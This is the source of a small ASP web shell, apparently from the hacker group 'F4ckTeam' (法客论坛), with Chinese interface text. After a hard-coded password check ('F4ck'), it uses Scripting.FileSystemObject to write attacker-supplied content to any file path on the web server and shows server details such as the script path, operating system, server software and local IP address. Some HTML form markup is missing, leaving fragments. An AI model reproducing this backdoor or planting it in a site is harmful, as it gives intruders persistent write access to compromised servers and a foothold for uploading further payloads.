<% on error resume next %> <% if request("pass")="F4ck" then '在这修改密码 session("pw")="go" end if %> <%if session("pw")<>"go" then %> <%="

"%> <%=" <%="type='submit' value='芝麻开门'>
"%> <%else%> <% set fso=server.createobject("scripting.filesystemobject") path=request("path") if path<>"" then data=request("da") set da=fso.createtextfile(path,true) da.write data if err=0 then %>
<%="恭喜你已经成功将文件写入"+path %> <%else%> <%="写不进去哦,可能权限不够哦!"%> <% end if err.clear end if da.close %> <%set da=nothing%> <%set fos=nothing%> <%=""%> 写入文件绝对路径:<%=""%> <%="
"%> <%="
"%> 系统信息:
<%="当前文件路径:"&server.mappath(request.servervariables("script_name"))%> <%="
"%> <%="操作系统为:"&Request.ServerVariables("OS")%> <%="
"%> <%="WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")%> <%="
"%> <%="服务器的IP为:"&Request.ServerVariables("LOCAL_ADDR")%>
<%="
"%><%="
"%> 文件内容:<%="
"%> <%=""%> <%=""%> <%="
"%> <%=""%> <%=""%>
法客论坛 - F4ckTeam访问论坛 <%end if%>